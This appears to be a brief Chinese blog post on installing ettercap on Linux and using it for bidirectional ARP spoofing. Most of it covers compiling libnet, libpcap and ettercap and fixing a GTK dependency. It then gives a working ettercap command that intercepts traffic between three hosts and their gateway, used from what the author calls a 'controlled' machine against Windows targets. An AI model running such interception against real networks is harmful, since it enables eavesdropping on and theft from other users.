linux下ettercap ARP双向欺骗

arpspoof真是老掉牙了，有以下三个缺点：

1。不支持双向欺骗，要实现，只能启动两个进程。

2。不支持多个ip，要不就是整个网段（除非也启动多个进程）

3。不支持mac地址伪造。

还是用ettercap吧，这个东西，介绍的资料都是windows下面的多。

我的被控端是linux下呀，而目标是windows。没有办法，硬着头皮装吧：

1..libnet-1.1.2.1.tar.gz

2.libpcap-1.0.0.tar.gz

3.ettercap-NG-0.7.3.tar.gz

4.更新gtk2： yum install curl-devel gtk2-devel boost-devel

（不然报错Package requirements (gtk+-2.0 >= 2.0.0 pango >= 1.0 atk >= 1.）

============以上几个包，因为装arpspoof要求低版本的，现在害的我装这个，又得全升级。

具体安装反正就是./configure,make,make install就不多说了。

使用：

ettercap -C （出来一个界面可以配置）

/usr/local/bin/ettercap -T -M arp:remote /192.168.219.1/ /192.168.219.17,26,35/

这个就是arp模式嗅探17,26,35与网关1之间的数据。

标签分类：